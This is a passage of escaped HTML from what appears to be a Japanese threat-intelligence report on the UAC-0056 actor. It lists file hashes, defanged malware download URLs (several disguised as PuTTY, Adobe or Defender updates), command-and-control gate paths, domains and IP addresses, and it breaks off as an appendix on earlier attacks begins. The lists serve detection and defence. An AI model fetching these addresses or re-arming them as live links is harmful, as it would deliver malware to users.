monospace;\">187e0a02620b7775c2a8f88d5b27e80b5d419ad156afc50ef217a95547d0feaa<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">18f24841651461bd84a5eac08be9bce9eab54b133b0e837d5298dac44e199d5f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1a1fe7b6455153152037668d47c7c42a068b334b91949739ed93256d5e3fbd89<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1e6596320a3fa48d8c13609a66e639b35fb1e9caae378552956aa9659809162b<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2762cbc81056348f2816de01e93d43398ba65354252c97928a56031e32ec776f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">27868ae50b849506121c36b00d92afe3115ce2f041cc28476db8dfc0cc1d6908<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2bef4a398a88749828afac59b773ae8b31c8e4e5b499aad516dd39ada1a11eca<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2d9d61ce6c01329808db1ca466c1c5fbf405e4e869ed04c59f0e45d7ad12f25b<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">3075a467e89643d1f37e9413a2b38328fbec4dd1717ae57128fdf1da2fe39819<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">320d091b3f8de8688ce3b45cdda64a451ea6c22da1fcea60fe31101eb6f0f6c2<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">37be3d8810959e63d5b6535164e51f16ccea9ca11d7dab7c1dfaa335affe6e3d<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">39e8455d21447e32141dc064eb7504c6925f823bf6d9c8ce004d44cb8facc80b<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">3d7a05e7ba9b3dd84017acab9aab59b459db6c50e9224ec1827cbf0a2aee47db<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">3f7b0d15f4cbe63e57fb06b57575bf6dd9eb777c737b0886250166768169fc6c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">4715a5009de403edd2dd480cf5c78531ee937381f2e69e0fb265b2e9f81f15c4<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">494122ff204f3dedaa8f0027f9f98971b32c50acbcce4efa8de0498efa148365<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">4c8a433ed99cc4b6994b2e1df59eb171f326373ba100a3653eb37e8a8ee2e6f2<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">4d59a7739f15c17f144587762447d5abb81c01f16224a3f7ce5897d1b6f7ee77<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">4ee84419fb9267081480954f1be176095a45fe299078dfa95f980e513b46a020<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">4fdc37f59801976606849882095992efecee0931ece77d74015113123643796e<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">506c90747976c4cc3296a4a8b85f388ab97b6c1cfae11096f95977641b8f8b6f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">56731c777896837782beff4432330486a941e4f3af44b4d24be7c62c16e96256<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">5fc108db5114be4174cb9365f86a17e25164a05cc1e90ef9ee29ab30abed3a13<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">619393d5caf08cf12e3e447e71b139a064978216122e40f769ac8838a7edfca4<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">61f5e96ec124fef0c11d8152ee7c6441da0ea954534ace3f5f5ec631dd4f1196<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">6a698edb366f25f156e4b481639903d816c5f5525668f65e2c097ef682afc269<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">6ee2fd3994acdbb9a1b1680ccd3ac4b7dcb077b30b44c8677252202a03dccf79<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">700b05fede8afe3573b6fec81452d4b09c29adb003cdacb762c8b53d84709901<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">707971879e65cbd70fd371ae76767d3a7bff028b56204ca64f27e93609c8c473<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">71e9cc55f159f2cec96de4f15b3c94c2b076f97d5d8cecb60b8857e7a8113a35<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">7419f0798c70888e7197f69ed1091620b2c6fbefead086b5faf23badf0474044<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">750c447d6e3c7d74ccab736a0082ef437b1cd2000d761d3aff2b73227457b29c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">75f728fa692347e096386acd19a5da9b02dca372b66918be7171c522d9c6b42d<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">7963f8606e4c0e7502a813969a04e1266e7cd20708bef19c338e8933c1b85eda<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">7b3d377ca2f6f9ea48265a80355fe6dc622a9b4b43855a9ddec7eb5e4666a1d4<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">7d7d9a9df8b8ffd0a0c652a3d41b9a5352efb19424e42942aaf26196c9698019<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">7e1355e51eb9c38e006368de1ae80b268ffab6918237696474f50802e3d8a9c8<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">7eb1dc1719f0918828cc8349ee56ca5e6bbde7cada3bc67a11d7ff7f420c7871<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">7ee8cfde9e4c718af6783ddd8341d63c4919851ba6418b599b2f3c2ac8d70a32<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">82d2779e90cbc9078aa70d7dc6957ff0d6d06c127701c820971c9c572ba3058e<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">89da9a4a5c26b7818e5660b33941b45c8838fa7cfa15685adfe83ff84463799a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">8ab3879ed4b1601feb0de11637c9c4d1baeb5266f399d822f565299e5c1cd0c4<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9528a97d8d73b0dbed2ac496991f0a2eecc5a857d22e994d227ae7c3bef7296f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">975f9ce0769a079e99f06870122e9c4d394dfd51a6020818feeef9ccdb8b0614<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9917c962b7e0a36592c4740d193adbd31bc1eae748d2b441e77817d648487cff<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9a72e56ac0f1badd3ca761b53e9998a7e0525f2055dbec01d867f62bdb30418e<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9cf4b83688dd5035623182d6a895c61e1e71ea02dc3e474111810f6641df1d69<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9d7c3463d4a4f4390313c214c7a79042b4525ae639e151b5ec8a560b0dd5bd0a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9ec80626504ca869f5e731aef720e446936333aaf6ab32bae03c0de3c2299f34<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9ee1a587acaddb45481aebd5778a6c293fe94f70fe89b4961098eb7ba32624a8<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9ef2d114c329c169e7b62f89a02d3f7395cb487fcd6cff4e7cac1eb198407ba6<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9fbeb629ea0dc72ac8db680855984d51b28c1195e48abff2e68b0228f49d5b0f<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">a61725f3b57fd45487688ad06f152d0db139a6cb29f3515ea90ffe15cb7e9a7a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">a9a89bb76c6f06277b729bc2de5e1aaef05fc0d9675edbc0895c7591c35f17eb<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">afdc010fc134b0b4a8b8788d084c6b0cff9ea255d84032571e038f1a29b56d0a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b02c420e6f8a977cd254cd69281a7e8ce8026bda3fc594e1fc550c3b5e41565d<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b0b0cb50456a989114468733428ca9ef8096b18bce256634811ddf81f2119274<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b0b4550ba09080e02c8a15cec8b5aeaa9fbb193cec1d92c793bdede78a70cec6<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b1af67bcfaa99c369960580f86e7c1a42fc473dd85a0a4d3b1c989a6bc138a42<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b2f5edef0e599005e205443b20f6ffd9804681b260eec52fa2f7533622f46a6c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b6e34665dd0d045c2c79bf3148f34da0b877514a6b083b7c8c7e2577362463b3<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b72188ba545ad865eb34954afbbdf2c9e8ebc465a87c5122cebb711f41005939<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b83c41763b5e861e15614d3d6ab8573c7948bf176143ee4142516e9b8bcb4423<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">b8ce958f56087c6cd55fa2131a1cd3256063e7c73adf36af313054b0f17b7b43<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">bd83e801b836906bab4854351b4d6000e0a435736524a504b9839b5f7bdf97cc<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">c222122fe3e1206ba2363c17fb37ae2f8e271840e17b3bb9ba5359f2793f9574<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">c33a905e513005cee9071ed10933b8e6a11be2335755660e3f7b2adf554f704a<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">c532d19652ea6d4e0ebb509766de1ec594dd80152f92f7ef6b80ad29d2aa8cf4<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">c6c47d3d7e56213f0d0ced379c64e166ed5a86308ea96856163a4e0155b1fc6e<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cb4a93864a19fc14c1e5221912f8e7f409b5b8d835f1b3acc3712b80e4a909f1<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cb6c05b2e9d8e3c384b7eabacde32fc3ac2f9663c63b9908e876712582bf2293<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cce564eb25a80549d746c180832d0b3d45dcd4419d9454470bfd7517868d0e10<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cd93f6df63187e3ac31ea56339f9b859b0f4fbe3e73e1c07192cef4c9a6f8b08<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">d4d4aa7d621379645d28f3a16b3ba41b971216869f5448ea5c1fc2e78cfecb26<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">d6e2a79bc87d48819fabe332dd3539f572605bb6091d34ae7d25ae0934b606b5<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">db8975fd6c04a7d3790eb73ab8e95b6dbf6c9d65ad5c6a6d3c862d0284f87c34<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">df3b1ad5445d628c24c1308aa6cb476bd9a06f0095a2b285927964339866b2c3<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">dfc24fa837b6cd3210e7ea0802db3dcf7bb1f85bff2c1b4bda4c3c599821bf8c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">e0c46e23bd1b5b96123e0c64914484bbfae7a7ad13cbd45184035d4c0f8a10a2<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">e8207e8c31a8613112223d126d4f12e7a5f8caf4acaaf40834302ce49f37cc9c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">e9a858127f5f6e5e0e94ed655a2bf9ed228f87bc99d9b12113e27dcc84be3909<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">ebbf30e06de3a25f76cf43c72c521d14a27053e4d9be566b41f50c41bea3a7a9<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">ec3c0afccfef11f753a408c859d98bbba4841e87f7f1a48573270c0d82252b03<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">ec62c984941954f0eb4f3e8baee455410a9dc0deb222360d376e28981c53b1a0<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">ec8868287e3f0f851ff7a2b0e7352055b591a2b2cb1c2a76c53885dee66562dc<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">f24ee966ef2dd31204b900b5c7eb7e367bc18ff92a13422d800c25dbb1de1e99<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">f2bdde99f9f6db249f4f0cb1fb8208198ac5bf55976a94f6a1cebfb0d6c30551<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">f4a56c86e2903d509ede20609182fbe001b3a3ca05f8c23c597189935d4f71b8<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">f58c41d83c0f1c1e8c1c3bd99ab6deabb14a763b54a3c5f1e821210c0536c3ff<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">fa1bc7d6f03a49af50f7153814a078a32f24f353c9cb2b8e3f329888f2b37a6e<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">fad2e8293cf38eec695b1b5c012e187999bd94fbcad91d8f110605a9709c31b3<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">ff07325f5454c46e883fefc7106829f75c27e3aaf312eb3ab50525faba51c23c<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">ffad5217eb782aced4ab2c746b49891b496e1b90331ca24186f8349a5fa71a28<\/span><\/p>\n<h2>\u95a2\u9023URL<\/h2>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">1000018[.]xyz\/soft-2\/280421-z1z.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1000018[.]xyz\/soft\/220421.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1000020[.]xyz\/soft\/230421.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1221[.]site\/15858415841\/0407.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1221[.]site\/1806.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">15052021[.]space\/2405.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">150520212[.]space\/0404.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">185.244.41[.]109:8080\/upld\/<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1924[.]site\/soft\/09042021.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">194.147.142[.]232:8080\/upld\/<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">194.147.142[.]232:8080\/upld\/<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2215[.]site\/240721-1.msi<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">31.42.185[.]63:8080\/upld\/<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">32689657[.]xyz\/putty5482.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">32689658[.]xyz\/putty5410.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">45.146.164[.]37:8080\/upld\/<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">45.146.165[.]91:8080\/upld\/<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">68468438438[.]xyz\/soft\/win230321.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">8003659902[.]space\/wp-adm\/gate.php<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">baiden00[.]ru\/def.bat<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">baiden00[.]ru\/win21st.txt<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">baiden00[.]ru\/wininst.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">bit[.]ly\/36fee98<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">bit[.]ly\/3qpy7Co<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/853604584806285335\/854020189522755604\/1406.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/908281957039869965\/908282786216017990\/AdobeAcrobatUpdate.msi<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/908281957039869965\/908310733488525382\/AdobeAcrobatUpdate.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/908281957039869965\/911202801416282172\/AdobeAcrobatReaderUpdate.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/908281957039869965\/911383724971683862\/21279102.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/932413459872747544\/932976938195238952\/loader.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/932413459872747544\/938291977735266344\/putty.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">eumr[.]site\/load4849kd30.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">eumr[.]site\/load74h74830.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">eumr[.]site\/up74987340.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">main21[.]xyz\/adm2021\/gate.php<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">mohge[.]xyz\/install.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">name1d[.]site\/123\/index.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">name1d[.]site\/def02.bat<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">name4050[.]com:8080\/upld\/9C9C2F98<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">orpod[.]ru\/def.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">orpod[.]ru\/putty.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">smm2021[.]net\/load2022.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">smm2021[.]net\/upload\/antidef.bat<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">smm2021[.]net\/upload\/Nvlaq.jpeg<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">smm2021[.]net\/wp-adm\/gate.php<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">stun[.]site\/42348728347829.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">update-0019992[.]ru\/testcp1\/gate.php<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">update0019992[.]ru\/exe\/update-22.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">update0019992[.]ru\/gate.php<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">update3d[.]xyz\/<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">webleads[.]pro\/public\/readerdc_ua_install.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">www.baiden00[.]ru\/win21st.txt<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">www.update0019992[.]ru\/exe\/update-22.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cdn.discordapp[.]com\/attachments\/908281957039869965\/908310733488525382\/AdobeAcrobatUpdate.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">cutt[.]ly\/1bR6rsQ<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">mohge[.]xyz\/install.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">mohge[.]xyz\/install.txt<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">stun[.]site\/zepok101.exe<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">superiortermpapers[.]org\/public\/WindowsDefender-UA.exe<\/span><\/p>\n<h2>\u30c9\u30e1\u30a4\u30f3<\/h2>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">000000027[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">001000100[.]xyz=<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1000018[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1000020[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1020[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1221[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">15052021[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">150520212[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1833[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1924[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2055[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2215[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2330[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">3237[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">32689657[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">32689658[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">68468438438[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">8003659902[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">8003659902[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9348243249382479234343284324023432748892349702394023[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">baiden00[.]ru<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">buking[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">coronavirus5g[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">eumr[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">main21[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">mohge[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">name1d[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">name4050[.]com<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">orpod[.]ru<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">smm2021[.]net<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">stun[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">update-0019992[.]ru<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">update0019992[.]ru<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">update3d[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">www.baiden00[.]ru<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">www.lywdm[.]com<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">www.update0019992[.]ru<\/span><\/p>\n<h2>IPv4\u30a2\u30c9\u30ec\u30b9<\/h2>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">185.244.41[.]109<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">194.147.142[.]232<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">31.42.185[.]63<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">45.146.164[.]37<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">45.146.165[.]91<\/span><\/p>\n<h2>\u8ffd\u52a0\u30a4\u30f3\u30d5\u30e9<\/h2>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">1000018[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1000019[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1000020[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1017[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1120[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1202[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1221[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">15052021[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">150520212[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">150520213[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1681683130[.]website<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">16868138130[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1833[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">1924[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2055[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2215[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">2330[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">29572459487545-4543543-543534255-454-35432524-5243523-234543[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">32689657[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">32689658[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">32689659[.]xyz<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">33655990[.]cyou<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">4895458025-4545445-222435-9635794543-3242314342-234123423728[.]space<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">9832473219412342343423243242364-34939246823743287468793247237[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">99996665550[.]fun<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">almamaterbook[.]ru<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">buking[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">getvps[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">giraffe-tour[.]ru<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">gosloto[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">name4050[.]com<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">noch[.]website<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">otrs[.]website<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">polk[.]website<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">sinoptik[.]site<\/span><br \/>\n<span style=\"font-family: 'courier new', courier, monospace;\">sony-vaio[.]ru<\/span><\/p>\n<h2><a id=\"appendix-a-prior-attacks-associated-with-uac-0056\"><\/a>\u4ed8\u9332A: UAC-0056\u3068\u95a2\u9023\u3059\u308b\u904e\u53bb\u306e\u653b\u6483<\/h2>\n<p>UAC-0056\u3068\u95a2\u9023\u3059\u308b\u904e\u53bb\u306e\u653b\u6483\u306b\u3064\u3044\u3066\u3001\u653b\u6483\u6642\u671f\u3054\u3068\u306b\u6574\u7406\u3057\u3066\u4ee5\u4e0b\u306b\u8aac\u660e\u3057\u307e\u3059\u3002\u65e2\u77e5\u306e\u653b\u6483\u306e\u6982\u8981\u306f\u5148\u306e\u300c<a href=\"#links-to-prior-attacks\">\u904e\u53bb\u306e\u653b\u6483\u3068\u306e\u95a2\u9023<\/a>\u300d\u30bb\u30af\u30b7\u30e7\u30f3\u306e\u30bf\u30a4\u30e0\u30e9\u30a4\u30f3\u3092\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<h3><a id=\"march-2021-attacks\"><\/a>2021\u5e743\u6708\u306e\u653b\u6483<\/h3>\n<p><a 